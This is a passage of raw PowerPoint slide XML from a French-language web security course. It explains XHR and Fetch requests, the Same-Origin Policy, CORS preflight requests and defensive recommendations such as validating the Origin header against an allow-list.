              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Xhr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3BA7BFF-1BDF-467C-BA12-CB08377DC08D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6135118" y="2088895"/>
            <a:ext cx="4583433" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="55000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Le contenu d’une réponse de requête XHR doit être formaté par le serveur sous un format de données non exécutable par le client (ex. : JSON ou XML)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1F6001C-E8EF-4945-A5D6-5BA2F7491005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="3966404"/>
            <a:ext cx="10034340" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="75000"/>
              <a:alpha val="68000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les requêtes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XHR GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>peuvent être utilisées uniquement : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ si elles comportent seulement des données publiques dans leurs URLs ; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ à des fins de récupération de données non sensibles (conservables dans un cache) ; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ à la condition de ne provoquer aucun traitement persistant ou changement d’état côté serveur (idempotence).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C24165FD-C3C4-407E-A101-8DA2BE22D253}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639824" y="5597764"/>
            <a:ext cx="10157612" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Il est recommandé d’utiliser la méthode POST pour les requêtes XHR pour éviter les risques de fuite de données.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8101631C-9CB0-4565-93E8-C3FE18D2BFBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="2088895"/>
            <a:ext cx="5450907" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="48000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Une page web effectuant un appel simple à une URL issue d’un site différent de l’Origin appelante est autorisée à émettre la requête mais la réponse sera par défaut refusée par le navigateur au motif du non-respect de la SOP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22420149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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Requêtes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (JS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8655F06-EC0F-49F4-923C-4C95758D8FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="1834463"/>
            <a:ext cx="5730036" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="49000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> se présente comme une alternative plus flexible à l’utilisation de XHR notamment par l’utilisation de promesses (Promises) JavaScript.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{195A2C64-520A-4818-9DC8-D0790ADC4BA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596805" y="4663854"/>
            <a:ext cx="5904848" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> présente un avantage en termes de simplicité et de sécurité par rapport à XHR car elle permet au développeur de spécifier, par configuration, son contexte d’utilisation légitime.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{397CD2A4-DA61-494F-AC27-4596B1113A59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6805265" y="1849159"/>
            <a:ext cx="4982270" cy="4039164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37073881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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Requêtes cors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8655F06-EC0F-49F4-923C-4C95758D8FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="1794152"/>
            <a:ext cx="3364302" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="47000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cross-Origin Resource Sharing (CORS) est un standard du Web permettant de dépasser la contrainte de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>-Origin Policy via des en-têtes HTTP.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{970F14D1-EF9F-4BD4-987D-8A80CED449EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="4140875"/>
            <a:ext cx="3364302" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="49000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’en-tête Origin, dont la falsification est empêchée par le navigateur, doit être contrôlé par l’application avec une liste d’Origins autorisées pour réduire le risque CSRF via CORS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCB372E4-3E4F-4EAC-B5CC-79916B45D52D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716954" y="1794152"/>
            <a:ext cx="6649875" cy="4503131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39474318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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Requêtes cors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CB4C3AC-4BC5-45DF-BD7E-917B861DAD87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="2084228"/>
            <a:ext cx="3603241" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="48000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Requêtes simples : une seule requête utilisant GET, POST, HEAD et en-tête standard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFE6E6A4-C36D-4ED8-A574-01DF58F07A7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="684210" y="3563236"/>
            <a:ext cx="4193361" cy="2040875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35A054FE-A019-4B3D-8722-19A91EC1394B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5009323" y="2461172"/>
            <a:ext cx="6596718" cy="3142939"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="814592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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Requêtes cors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CB4C3AC-4BC5-45DF-BD7E-917B861DAD87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="1744415"/>
            <a:ext cx="5221017" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="48000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Requêtes nécessitant une requête préliminaire (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>preflight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>les requêtes préliminaires envoient d'abord une requête HTTP avec la méthode </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="sng" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>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OPTIONS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> vers la ressource de l'autre domaine afin de déterminer quelle requête peut être envoyée de façon sécurisée. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A79CAE1-6BA8-4147-B5C1-E3539C7250E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="684210" y="3591340"/>
            <a:ext cx="5221019" cy="2659456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{961146C7-6395-48FD-A724-A6BB5BBE8E09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
